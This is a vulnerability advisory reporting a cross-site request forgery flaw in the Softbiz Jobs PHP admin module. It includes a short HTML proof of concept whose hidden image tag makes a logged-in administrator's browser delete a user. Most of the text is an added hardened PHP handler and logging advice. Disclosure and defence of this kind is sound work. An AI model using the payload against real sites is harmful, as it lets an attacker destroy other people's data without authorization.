Softbiz Jobs - Cross-Site Request Forgery

EDB-ID: 11543

CVE:

Platform: PHP

Date: 2010-02-23


=======================================================================
                    Softbiz Jobs CSRF Vulnerability
=======================================================================

                                  by

                            Pratul Agrawal
 
 
# Vulnerability found in: Admin module
 
# email         Pratulag@yahoo.com
 
# company       aksitservices
 
# Credit by     Pratul Agrawal

# Download      http://www.softbizscripts.com/

# Script        softbizscripts

 
 
# Proof of concept

HTML page that deletes a registered user through cross-site request forgery. When a logged-in administrator loads it, the browser sends a GET request to delete_employer.php with the admin's session cookie attached, and the script performs the deletion without any CSRF token or confirmation step:

...................................................................................................................

<html>
  <body>
    <!-- forged GET to the admin delete handler; the browser attaches the admin's session cookie -->
    <img src="http://server/scripts/seojobs/admin/delete_employer.php?id=[USER ID]" />
  </body>
</html>

...................................................................................................................



After the page has loaded, refresh the admin user list and you will see that the user with id=20 (the [USER ID] value used in the test) has been deleted automatically.
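The root cause is a state-changing admin action that is reachable by a plain GET request and authenticated by nothing but the session cookie, which the browser attaches to any request, including one triggered by an attacker's <img> tag. The following is an added example of how such a handler can be hardened; it is not Softbiz's code. It assumes the admin area uses PHP sessions, and the functions is_admin_logged_in() and delete_employer_by_id() are hypothetical stand-ins for the module's own authentication and data-access code; the field name csrf_token is likewise an assumption.

```php
<?php
// Added example, not Softbiz's code: a CSRF-resistant rewrite of an admin
// delete handler such as admin/delete_employer.php. Assumes the admin area
// uses PHP sessions; is_admin_logged_in() and delete_employer_by_id() are
// hypothetical functions standing in for the module's own auth and data code,
// and the field name 'csrf_token' is an assumption.

// Bind the session cookie to same-site navigations (PHP >= 7.3) so a cross-site
// <img> or form post does not carry it at all. This complements the token check.
session_set_cookie_params(['samesite' => 'Lax', 'httponly' => true]);
session_start();

// One unpredictable token per session, stored server-side.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Constant-time comparison; an attacker's page cannot read the session token,
// so it cannot forge a request that passes this check.
function csrf_valid(string $sent): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    return $expected !== '' && hash_equals($expected, $sent);
}

if (!is_admin_logged_in()) {          // hypothetical auth check
    http_response_code(401);
    exit('Not authorised');
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // Only a POST carrying the session's token may delete anything.
    if (!csrf_valid($_POST['csrf_token'] ?? '')) {
        http_response_code(403);
        exit('Forbidden: missing or invalid CSRF token');
    }
    $id = filter_input(INPUT_POST, 'id', FILTER_VALIDATE_INT);
    if ($id === null || $id === false) {
        http_response_code(400);
        exit('Bad employer id');
    }
    delete_employer_by_id($id);       // hypothetical data-access call
    exit('Employer ' . $id . ' deleted');
}

// A GET never changes state. The forged <img src="...delete_employer.php?id=20">
// from the proof of concept now only renders this confirmation form, which the
// attacker's page cannot submit because it does not know the token.
$id = filter_input(INPUT_GET, 'id', FILTER_VALIDATE_INT);
if ($id === null || $id === false) {
    http_response_code(400);
    exit('Bad employer id');
}
?>
<form method="post" action="delete_employer.php">
  <input type="hidden" name="csrf_token"
         value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') ?>">
  <input type="hidden" name="id" value="<?= (int) $id ?>">
  <button type="submit">Delete employer <?= (int) $id ?></button>
</form>
```

With this in place, loading the proof-of-concept page as an administrator produces a 400 or a harmless confirmation form rather than a deletion, and a forged POST fails the token check with 403. Those 403 responses on admin endpoints, especially with a foreign Referer or Origin header, are also a useful signal to log and alert on, since legitimate admin forms always carry the token.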

 
#If you have any questions, comments, or concerns, feel free to contact me.